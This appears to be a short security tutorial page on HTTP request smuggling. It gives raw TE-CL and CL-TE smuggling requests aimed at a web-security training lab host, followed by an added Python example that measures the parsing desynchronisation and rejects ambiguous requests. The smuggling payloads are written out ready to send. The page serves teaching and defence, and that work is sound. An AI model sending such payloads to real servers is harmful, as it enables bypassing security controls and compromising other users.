HTTP Smuggling

DeeLMind, less than 1 minute read

YouTube tutorial series

Bilibili tutorial series

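What is HTTP Smuggling

HTTP request smuggling is a technique for interfering with the way a website processes sequences of HTTP requests received from one or more users. Request smuggling vulnerabilities are often critical in nature: they allow an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.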

CL(TE) - TE(CL)

  • Content-Length
  • Transfer-Encoding

TE-CL

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: x
Transfer-Encoding: chunked

aa

GET /404 HTTP/1.1
X-Ignore: X

0

CL-TE

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

0
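
The CL-TE request above is ambiguous because a parser that trusts Content-Length and one that trusts Transfer-Encoding end the body at different bytes. The following is an added example, not part of the original page, and its helper names are illustrative: it measures what each interpretation leaves on the connection and applies a front-end policy that refuses any request carrying both headers.

```python
# Added example (not from the original page); helper names are illustrative.
CRLF = b"\r\n"

def split_head(raw):
    """Return (headers, bytes after the blank line); header names lowercased."""
    head, _, rest = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:              # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, rest

def leftover_by_content_length(headers, rest):
    """Bytes left on the connection for a parser that trusts Content-Length."""
    return rest[int(headers[b"content-length"][0]):]

def leftover_by_chunked(rest):
    """Bytes left on the connection for a parser that trusts chunked framing."""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)   # chunk size is hexadecimal
        if size == 0:
            while True:                            # skip trailers up to the blank line
                line, _, rest = rest.partition(CRLF)
                if not line:
                    return rest
        rest = rest[size + 2:]                     # chunk data plus its CRLF

def classify(raw):
    """Front-end policy: refuse any request whose body length is ambiguous."""
    headers, _ = split_head(raw)
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    if cl and te:
        return "reject: Content-Length together with Transfer-Encoding"
    if len(set(cl)) > 1:
        return "reject: conflicting Content-Length values"
    return "accept"

# Constructed from the CL-TE request shown above (CRLF line endings).
SAMPLE = CRLF.join([
    b"POST / HTTP/1.1", b"Host: your-lab-id.web-security-academy.net",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 35", b"Transfer-Encoding: chunked", b"",
    b"0", b"", b"GET /404 HTTP/1.1", b"X-Ignore: X",
])

if __name__ == "__main__":
    headers, rest = split_head(SAMPLE)
    print(classify(SAMPLE))
    print("CL parser leftover:", leftover_by_content_length(headers, rest))
    print("TE parser leftover:", leftover_by_chunked(rest))
```

A non-empty difference between the two leftovers is the desynchronisation: one hop considers the request finished while the other still holds bytes it will treat as the start of the next request.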